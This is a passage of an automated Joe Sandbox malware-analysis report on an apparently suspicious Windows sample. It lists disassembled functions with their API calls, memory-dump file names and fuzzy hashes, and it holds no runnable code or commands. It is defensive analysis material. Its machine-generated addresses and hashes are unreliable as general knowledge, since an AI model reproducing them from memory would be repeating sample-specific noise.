InternetReadFile.WININET(?,00000000,?,?), ref: 0071CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0071C21E,00000000), ref: 0071CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0071C21E,00000000), ref: 0071CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0071C21E,00000000), ref: 0071CFF2

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 1dd7407f308a1b1bddf7ddbbd85bfad176248f1370edf59d63eaab90db812b82
Instruction ID: e2a6ae22a1033bbaf3ac96322c0cb8abe4e407ca97c35a7e2f24e0acc46e39cb
Opcode Fuzzy Hash: 1dd7407f308a1b1bddf7ddbbd85bfad176248f1370edf59d63eaab90db812b82
Instruction Fuzzy Hash: E8314F72540205AFDB21DFE9C8849EBBBFDEB14351B10842EF516E2190D738EE829B64

Function 00701901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00701915
PostMessageW.USER32(00000001,00000201,00000001), ref: 007019C1
Sleep.KERNEL32(00000000,?,?,?), ref: 007019C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 007019DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 007019E2

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 07dd149b171eab3e3dd14a7fe93011be3be12e3f1e505a52bf6d433887a1979e
Instruction ID: 1dae97ac1a76f1816144f6cc83905d18d39eb55001df4f037ad1b871b861868d
Opcode Fuzzy Hash: 07dd149b171eab3e3dd14a7fe93011be3be12e3f1e505a52bf6d433887a1979e
Instruction Fuzzy Hash: 2F31D171A10259EFDB00CFA8CD99ADE3BB5EB05315F508329F921A72D1C774AD44DB90

Function 00735706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00735745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0073579D
_wcslen.LIBCMT ref: 007357AF
_wcslen.LIBCMT ref: 007357BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00735816

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 6b02974a2139a1f69b9a3f06057975b03bf83dfa57d8dd226698498037ca96d4
Instruction ID: 2569d568b952c656dd8ea0e9876d3f60de138acd24f3418fa41da0762a08166d
Opcode Fuzzy Hash: 6b02974a2139a1f69b9a3f06057975b03bf83dfa57d8dd226698498037ca96d4
Instruction Fuzzy Hash: 45219671904618DAEB20DF64CC85EED77B8FF04724F108256F919EB181D7789985CF50

Function 00720930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00720951
GetForegroundWindow.USER32 ref: 00720968
GetDC.USER32(00000000), ref: 007209A4
GetPixel.GDI32(00000000,?,00000003), ref: 007209B0
ReleaseDC.USER32(00000000,00000003), ref: 007209E8

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 2f3acf62926c5dc75a484f25e2c268c6e775e616ca5db68dc9db2e2dcbe1595a
Instruction ID: 1832741f6c6e4817c8238058e0b53ad19e6434e4a86a8d43056e9797b618d9c5
Opcode Fuzzy Hash: 2f3acf62926c5dc75a484f25e2c268c6e775e616ca5db68dc9db2e2dcbe1595a
Instruction Fuzzy Hash: 54216275600214EFD704EF69D849A9EB7E5EF45701F04806CE846A7762DB34AD44CB94

Function 006DCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 006DCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006DCDE9

Part of subcall function 006D3820: RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 006DCE0F
_free.LIBCMT ref: 006DCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006DCE31

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: ce353acf0768861f0230db6d7a3c0665d1f846854fc223a6b223364437af78bb
Instruction ID: 5a65930ac331323c202c53e62deb77828f8671dd5b592b31bb769b961bb21018
Opcode Fuzzy Hash: ce353acf0768861f0230db6d7a3c0665d1f846854fc223a6b223364437af78bb
Instruction Fuzzy Hash: D401B5B2E0121B7F772116BA6C58DBBBA6EDEC6BB1315412AF905D7300DA648D01D2B4

Function 006B9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006B9693
SelectObject.GDI32(?,00000000), ref: 006B96A2
BeginPath.GDI32(?), ref: 006B96B9
SelectObject.GDI32(?,00000000), ref: 006B96E2

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2de4d58a562d0284fb22415752fa900933b68e6ed0d7e38de1e3af426652b721
Instruction ID: 4382bcf5fc9e39fd00f339c7a417fbcc0c3eb0be21e7b36761f2b7859ce9df13
Opcode Fuzzy Hash: 2de4d58a562d0284fb22415752fa900933b68e6ed0d7e38de1e3af426652b721
Instruction Fuzzy Hash: BF21C5B1801349EFEB118F28DC047E97BB6BB10395F508216F614A61B0E37868C2CFA8

Function 00705711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00705726
_memcmp.LIBVCRUNTIME ref: 00705744
_memcmp.LIBVCRUNTIME ref: 00705757
_memcmp.LIBVCRUNTIME ref: 0070576F
_memcmp.LIBVCRUNTIME ref: 00705787

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: d46096b21e72e0aa00e33ada5c53fcf3725ea46040bbe89096dd9e2bda915681
Instruction ID: 44e7fc5ee0da425991544ec15317b7f9886ddad094edd1cb3fa21356033eacb1
Opcode Fuzzy Hash: d46096b21e72e0aa00e33ada5c53fcf3725ea46040bbe89096dd9e2bda915681
Instruction Fuzzy Hash: 1001B9E1681605FBE71855209E52FBB739DDF22398F005128FD089E2C2FB68ED1096B5

Function 006D2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,006CF2DE,006D3863,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6), ref: 006D2DFD
_free.LIBCMT ref: 006D2E32
_free.LIBCMT ref: 006D2E59
SetLastError.KERNEL32(00000000,006A1129), ref: 006D2E66
SetLastError.KERNEL32(00000000,006A1129), ref: 006D2E6F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b61dc8f60ce90a64477daa5c575fe53385610716e51c337878fca03f2bf795c
Instruction ID: 909f4e634583a9a8e0918f9cebbca9f3dbbb8fa0c3984a0a95ee0996063b78d9
Opcode Fuzzy Hash: 2b61dc8f60ce90a64477daa5c575fe53385610716e51c337878fca03f2bf795c
Instruction Fuzzy Hash: 3F014932E046026BC61323356CA6D6B275BABF23B2720842FF421A3392EE78CC010165

Function 0070000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?,?,0070035E), ref: 0070002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?), ref: 00700064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700070

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: e586688b982cc5b4c03d397a77e37688e58d16fe8e598b88f13ad167e6adb84f
Instruction ID: b03e19bfc15da9bf7fb53ed1696616d69ed52d751011f21a1154d94c80cf6603
Opcode Fuzzy Hash: e586688b982cc5b4c03d397a77e37688e58d16fe8e598b88f13ad167e6adb84f
Instruction Fuzzy Hash: F5016276600214FFEB118F69DC48BAA7AEDEF44762F148224F905E6250DB79DE409BA0

Function 0070E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0070E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0070E9A5
Sleep.KERNEL32(00000000), ref: 0070E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0070E9B7
Sleep.KERNEL32 ref: 0070E9F3

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 1c866707b28e5d78e19bab7748b92478cbbbaa50876aef08a02bb79d9f5d2bbb
Instruction ID: 22d8a1b6e0f8b59b947d74176f5d5dfe5c23966812c1b01403f5ffd1f94a1992
Opcode Fuzzy Hash: 1c866707b28e5d78e19bab7748b92478cbbbaa50876aef08a02bb79d9f5d2bbb
Instruction Fuzzy Hash: 65019271C1162DDBDF009FE5DC596DDBBB8FF08302F004A46E502B2191DB38A550D7A6

Function 007010F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00701114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 0070112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0070114D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: adbc4afb0a3c26a321676fea66d31fd298bfc62be6ad708ac589f3c430181e3b
Instruction ID: eecebe33a0fa503603399d8bc556fa353fecf2d183cc62bb50cefd3f8708e0a8
Opcode Fuzzy Hash: adbc4afb0a3c26a321676fea66d31fd298bfc62be6ad708ac589f3c430181e3b
Instruction Fuzzy Hash: 95018175100209FFEB164F68DC49E6A3FAEEF85361B104414FA41D3350DB35DC009B60

Function 00700FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00700FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00700FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00700FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00700FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00701002

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 108156d75025e8ae24428cb0246d8b13cbf64cfdd290de519dbbd0e629bae011
Instruction ID: 644e6f7c5f62c1686e942a629eaf652fe2ac3b36f548b5d79626ff5dbe5b2ea7
Opcode Fuzzy Hash: 108156d75025e8ae24428cb0246d8b13cbf64cfdd290de519dbbd0e629bae011
Instruction Fuzzy Hash: 0BF06D75200305EBEB224FA4DC4EF563BADEF89762F508414FA85E7291CA79DC508B60

Function 00701014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0070102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00701036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00701045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0070104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00701062

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f8c35013a3765e34fab2ae37f9f03e92aa527f935161fc96d58571e05e4c004a
Instruction ID: 7128f9a7466fda5ca06938ae6da154ac53c9828eb8b5caba5b88b7df041ce3fe
Opcode Fuzzy Hash: f8c35013a3765e34fab2ae37f9f03e92aa527f935161fc96d58571e05e4c004a
Instruction Fuzzy Hash: F0F06D75300305EBEB225FA4EC49F563BADEF89762F504414FA85E7290CA79DC508B60

Function 0071030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 00710324
CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 00710331
CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 0071033E
CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 0071034B
CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 00710358
CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 00710365

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8736158a8a4f3617b53a2584d12bc8eb98337e29f324d569473944926ce1c5e0
Instruction ID: 310a2a9894c9798cb31910b1b0255038d3e55aa540bfb0810e3a76cdbf634e86
Opcode Fuzzy Hash: 8736158a8a4f3617b53a2584d12bc8eb98337e29f324d569473944926ce1c5e0
Instruction Fuzzy Hash: D901AE72800B159FCB30AF6AD880852FBF9BF603153158A3FD1A652971C3B5A999DF80

Function 006DD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006DD752

Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0

_free.LIBCMT ref: 006DD764
_free.LIBCMT ref: 006DD776
_free.LIBCMT ref: 006DD788
_free.LIBCMT ref: 006DD79A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ff96af869f18e3dd4f82b9c70df998a4d1b80513e304a724c65e58de7f4bef65
Instruction ID: a5ea2a6cd58a442d9232db41eb0056801a655f89681be5cb1cf2cefe745acfbb
Opcode Fuzzy Hash: ff96af869f18e3dd4f82b9c70df998a4d1b80513e304a724c65e58de7f4bef65
Instruction Fuzzy Hash: 92F06232D40305AB8662FB65F9D1C6A77DFBB54710B99484BF099DB701C734FC808A68

Function 006D22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006D22BE

Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0

_free.LIBCMT ref: 006D22D0
_free.LIBCMT ref: 006D22E3
_free.LIBCMT ref: 006D22F4
_free.LIBCMT ref: 006D2305

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c607da22cf200d97bb8f36867f762785852637c2b25c1a5020c333fec41120ea
Instruction ID: 5f0ce4150ffd0f53572a3cf7d4dbd5c1e938c9bc49884daa4707c3bf4c7a02f0
Opcode Fuzzy Hash: c607da22cf200d97bb8f36867f762785852637c2b25c1a5020c333fec41120ea
Instruction Fuzzy Hash: E3F05470D002128B8663BF69BC218583B66F728B90740850BF419D7372CB7C0591BFEC

Function 006B95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 006B95D4
StrokeAndFillPath.GDI32(?,?,006F71F7,00000000,?,?,?), ref: 006B95F0
SelectObject.GDI32(?,00000000), ref: 006B9603
DeleteObject.GDI32 ref: 006B9616
StrokePath.GDI32(?), ref: 006B9631

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
